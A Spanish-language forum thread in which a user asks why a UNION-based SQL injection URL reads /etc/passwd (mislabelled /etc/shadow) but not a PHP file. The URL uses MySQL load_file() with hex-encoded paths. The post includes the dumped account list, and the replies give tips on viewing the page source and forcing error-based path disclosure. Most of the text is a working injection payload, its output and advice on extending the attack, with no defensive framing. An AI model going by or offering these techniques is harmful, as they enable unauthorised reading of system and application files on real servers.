Hola bro tengo una duda :

hago una sentencia de sql injected y no logro leer un archivo php, pero sin envargo si puedo leer el
/etc/shadow


me parece estraño la sentencia es esta


http://host/sql-injected.php?id=-1+union+all+select+1,load_file(0x2f7661722f7777772f73716c2d696e6a65637465642e706870),user(),4,5,load_file(0x2f6574632f706173737764)

y el resultado :

Nombre: aki y en el source fuente no sale el php ¬¬
Clave : root@localhost
Activo: 4
tipo usuario: 5
Nombre usuario: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false saned:x:106:113::/home/saned:/bin/false pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false messagebus:x:108:117::/var/run/dbus:/bin/false polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false master:x:1000:1000:master,,,:/home/master:/bin/bash mysql:x:112:125:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:1001:1001:PostgreSQL:/opt/PostgreSQL/8.3:/bin/sh Debian-exim:x:114:128::/var/spool/exim4:/bin/false honeyd:x:115:129:Honeyd daemon,,,:/var/log/honeypot:/bin/false tomcat55:x:116:65534::/usr/share/tomcat5.5:/bin/false tomcat6:x:117:130::/usr/share/tomcat6:/bin/false

Inyeccion -----> SELECT * from bit_user WHERE bit_user_id =-1 union all select 1,load_f

talves lo carga pero como comienza con los tags de <? y termina con ?> el explorador no lo interpreta y se ve blanco, miralo en el codigo fuente y de seguro te aparecerá de color rosado 

le pusiste solo el archivo o le diste la ruta completa?
para eso existen los path disclosures 
si haces que el script arroje algún error podrás ver en que ruta están los archivos del sistema web.